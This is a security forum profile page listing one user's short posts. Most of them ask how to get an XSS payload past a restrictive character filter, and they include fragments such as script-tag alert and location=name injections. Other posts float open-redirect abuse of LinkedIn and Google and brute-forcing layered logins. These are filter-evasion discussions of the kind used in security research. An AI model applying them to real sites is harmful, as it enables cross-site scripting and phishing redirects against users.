Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 1
Results 1 - 19 of 19
2 years ago
asrail
Did anyone found out yet what hashing linkedin.com uses? Looks like some sort of security by obscurity to me. If i knew the hash, i might have an open redirect here? http://www.linkedin.com/redir/redirect?url=http%3A%2F%2Ftalent%2Elinkedin%2Ecom%2F%3Fpin%3Dtr02&urlhash=zJmW Or maybe it's a honeypot to waste "hackers" time, and they check which sites are linked, or if javascr
Forum: Obfuscation
2 years ago
asrail
Thank you Gareth, that was awesome. I didn't think of an iframe that loads nothing and instantly triggers the onload... had to add that to my repertoire :-) Will hopefully aquire a new customer this way. You earned yourself a beer!
Forum: XSS Info
2 years ago
asrail
As you can see in some cases the brackets {} do work and aren't filtered... It's like there is some sort of randomizer i manage to insert a link like this: xxx?search=<a href='feed:data:x,123456'>Click</a> yields <a href=feed:data:x,123456>click<a>&ldquo; <h1> But can't link to anything outside, because no "/"... I started some random te
Forum: XSS Info
2 years ago
asrail
Thanks, understood the location=name now - very nice. Whitespace is going through and commas too. The main issue left is how to prevent the script error in this: <script>location=name&ldquo; </h1> maybe it's possible to use the "&" and the ";" somehow... but i got no idea so far. WHITELIST updated: a-Z 0-9 - < > . : =
Forum: XSS Info
2 years ago
asrail
<h1 id="xy"> foo bar XXXXXXXXXXXXXXXX&ldquo; </h1> I can inject at XXXXXXXXXXX. Whitelist: a-Z 0-9 - < > . : = Updated: forgot the "=" char is allowed, too.
Forum: XSS Info
2 years ago
asrail
Sorry, i manage to do the basic XSS stuff, but i never got that location/window.name stuff. Maybe you got a link where it's explained a little further? How would i avoid the script error because of the missing ability to close an opening <script> block? <script>location=name</script> becomes <script>location=name<script> I can also not use html comments
Forum: XSS Info
2 years ago
asrail
I forgot to mention, i also don't have the brackets [] .... It's as if they read http://sla.ckers.org/forum/read.php?24,32930
Forum: XSS Info
2 years ago
asrail
The input from a get parameter is being reflected in the HTML code. I am in the middle of html tags.. I can inject basic html tags, attributes (without any type of quote) but i cannot inject any slashes. <script>alert('1:=!')</script> becomes <script>alert1:=<script> I am losing all brackets, double-quotes, single quotes, exclamation marks, etc.
Forum: XSS Info
2 years ago
asrail
I am having trouble getting around a restrictive XSS filter (also being limited to exactly 70 characters) The filter removes any /,",',(,),! What goes through is <,>,=,: and normal alphanumeric characters and numbers. Anyone got an idea what i could do? Not having brackets/slashes is probably the biggest issue here.
Forum: XSS Info
6 years ago
asrail
If you want to surprise your boss, do it with your own achievements. If you don't have a clue, what will you answer if he has detailed questions? What will you do if he asks you to continue working on security/xss related stuff? If you don't have any expertise there, you will utterly fail. You're better off reading up on xss and trying to find out things by yourself. just my 3 cents
Forum: XSS Info
6 years ago
asrail
The average dumb user isn't interested in this funky thing called "url", he just clicks on File->Send page to send a link to a friend. Public "information page" urls should be readable, easy to type and never change. But system "action-urls" (like adding something to a shopcart etc) totally don't matter, since the user directly interacts with elements within the
Forum: OMG Ponies
6 years ago
asrail
row_count | row_count OFFSET offset}] read more about it at http://dev.mysql.com/doc/refman/5.0/en/select.html TOP <numberOfFirstHits> Limit enables you to page through result sets, by setting the start index of the first result you wanna fetch and the maximum number of hits you want to retrieve. TOP only gives the first N hits - no possibility to define where to start in the resu
Forum: SQL and Code Injection
6 years ago
asrail
I can't seem to find the sources for the noscript extension - anyone got a url? The website http://noscript.net/ itself does not give any information about "how to contribute" aka "how to white box test for vulnerabilities".
Forum: Projects
6 years ago
asrail
You gotta remember the different search results for different browser locales - if the user is russian and searches google, he probably sees other search results than the results your server gets, using the google api with a probably different locale. btw: is the google api key attached to some sort of locale / is it possible to set a locale upon google Api requests? You don't even need to r
Forum: Search Engine Hacking and SEO
6 years ago
asrail
rsnake Wrote: ------------------------------------------------------- > @asrail - as id stated I am not using htaccess to > do authentication, I am using it to do IP > filtering (go to > http://ha.ckers.org/blog/wp-admin/ to see what > we're talking about. You can do a lot more than > just that too if you know what you're doing. Look > at mod_auth_external for ideas.
Forum: News and Links
6 years ago
asrail
rsnake Wrote: ------------------------------------------------------- > I've htaccess protected the > admin directory so no > one can brute force the password. You can still bruteforce the HTTP basic authentication and afterwards bruteforce the wp login. Though it takes some more time this way cause you need to get over two logins.
Forum: News and Links
6 years ago
asrail
A well known german hoster (and many others too) offer SSL for customer domains, but for some reason which i can't figure out (I don't care really) they don't just enable https://customerdomain.tld but rather use an external service that works like this: https://ssl-id.de/customerdomain.tld/ First, this is annyoing because once the user switches to a part of a site that uses the ssl one, he qui
Forum: News and Links
6 years ago
asrail
I just saw in this post: http://sla.ckers.org/forum/read.php?13,16082 that .mario is already using such a google link.
Forum: News and Links
6 years ago
asrail
I always wondered if I could abuse the google "i feel lucky" (or whatever it's called in the english version) search mode to redirect users without them expecting it. The second button on the google search form directly sends you to the first search result url. Try this one for example: http://google.de/search?&q=gmail%20login&btnI= It should directly take you to the gmail
Forum: News and Links
Current Page: 1 of 1